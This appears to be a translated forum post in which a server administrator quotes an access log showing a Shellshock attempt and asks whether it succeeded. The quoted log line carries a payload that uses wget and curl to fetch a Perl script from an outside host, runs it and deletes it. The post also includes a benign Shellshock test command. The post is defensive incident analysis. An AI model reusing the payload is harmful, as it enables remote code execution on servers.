Stavo controllando i log oggi e ho notato quanto segue:
62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/bo.pl;chmod +x /tmp/bo.pl;perl /tmp/bo.pl;rm -rf /tmp/bo*\""
Come ho ben capito questo è un tentativo di analizzare la vulnerabilità shellshock. Ho recuperato il file caricato bo.pl - che conteneva il seguente ...
<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://192.168.1.1/blocking.asp?cat_id=78">
</head>
<body></body>
</html>
Ora, a quanto ho capito, questo sta usando la tecnica di aggiornamento per visualizzare una pagina blocking.asp di qualche tipo.
Sono positivo dato che prova che si trattava di un attacco malevolo. La cosa che mi preoccupa è il registro mostra 13501 per la lunghezza della risposta. Ma quando ho provato a usare l'intestazione shellshock semplice per testare l'abilità ...
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
Ho ricevuto solo la seguente voce di registro ...
71.121.200.199 - - [26/Dec/2016:18:14:11 -0100] "GET / HTTP/1.1" 200 22 "-" "() { :; }; /bin/eject"
Sono anche andato a controllare la directory / tmp e ho trovato due file che non corrispondono esattamente all'ora sui log ma sembrano sospetti visto che si tratta di un server headless e questi sembrano essere collegati a servizi desktop remoti di qualche tipo.
-rw-r--r-- 1 0 0 8 Dec 25 03:46 httpd_lua_shm.2693
drwxrwxrwt 2 0 0 4096 Dec 24 18:42 .ICE-unix
Quindi la mia domanda è - questo sembra essere un attacco di successo a causa del fatto che i byte nella risposta sono così grandi? C'è qualche altra cosa che dovrei controllare oltre alla cronologia di bash e tale da cercare degli indizi su cosa è successo?